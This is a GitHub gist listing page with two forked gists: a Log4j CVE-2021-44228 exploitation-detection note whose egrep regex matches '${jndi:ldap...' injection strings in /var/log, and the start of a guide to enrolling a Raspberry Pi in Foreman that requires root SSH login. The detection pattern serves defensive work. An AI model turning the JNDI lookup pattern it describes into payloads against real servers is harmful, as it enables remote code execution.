Skip to content

Instantly share code, notes, and snippets.

View gawainXX's full-sized avatar

gawainXX

1 follower · 1 following
View GitHub Profile
@gawainXX
gawainXX / log4j_rce_detection.md
Created December 13, 2021 20:19 — forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@gawainXX
gawainXX / Foreman_Puppet_7.x_Raspbian.md
Last active January 25, 2023 07:24 — forked from aaroncoffey/Puppet_6.3_Raspbian.md
How to add a Raspberry Pi 10 (Buster) agent device to Foreman for management and Remote Execution

How to add a Raspberry Pi 10 (Buster) agent device to Foreman for management and Remote Execution

These instructions were tested on a pi 3b and 4b with the latest version of raspbian (Raspbian GNU/Linux 10 (Buster)).

This guide assumes basic competency with the command line. It also assumes your Foreman Proxy/Server and the client device you are going to be managing meet the following criteria.

Raspberry Device Configuration Requirements

  • OS is Raspbian 10 Buster (armhf)
  • Root is enabled with a set password.
  • SSH is enabled with PermitRootLogin is either set to prohibit-password or yes in /etc/ssh/sshd_config